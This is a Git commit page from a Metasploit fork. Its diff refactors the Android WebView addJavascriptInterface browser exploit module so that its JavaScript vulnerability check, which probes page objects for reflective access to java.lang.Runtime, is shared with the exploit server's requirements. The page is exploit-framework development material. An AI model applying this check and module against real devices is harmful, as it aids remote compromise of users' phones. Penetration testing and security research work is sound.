adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Adds a :vuln_test option to BES, just like in BAP.

Browse Source 
I needed this to run a custom JS check for the Android
webview vuln when the exploit is served straight
through BES. The check already existed when using BAP,
so I tried to preserve that syntax, and also added a
:vuln_test_error as an optional error message.

This commit also does some mild refactoring of un-
useful behavior in BES.
This commit is contained in:
Joe Vennix
2014-10-01 23:34:31 -05:00
parent 0380c5e887
commit 5a8eca8946
3 changed files with 86 additions and 59 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/android/browser/webview_addjavascriptinterface.rb
+13 -9
View File
@@ -12,18 +12,20 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::BrowserAutopwn
include Msf::Exploit::Android
VULN_CHECK_JS = %Q|
for (i in top) {
try {
top[i].getClass().forName('java.lang.Runtime');
is_vuln = true; break;
} catch(e) {}
}
|
autopwn_info(
:os_flavor => 'Android',
:javascript => true,
:rank => ExcellentRanking,
:vuln_test => %Q|
for (i in top) {
try {
top[i].getClass().forName('java.lang.Runtime');
is_vuln = true; break;
} catch(e) {}
}
|
:vuln_test => VULN_CHECK_JS
)
def initialize(info = {})
@@ -71,7 +73,9 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0,
'BrowserRequirements' => {
:source => 'script',
:os_flavor => 'Android'
:os_flavor => 'Android',
:vuln_test => VULN_CHECK_JS,
:vuln_test_error => 'No vulnerable Java objects were found in this web context.'
}
))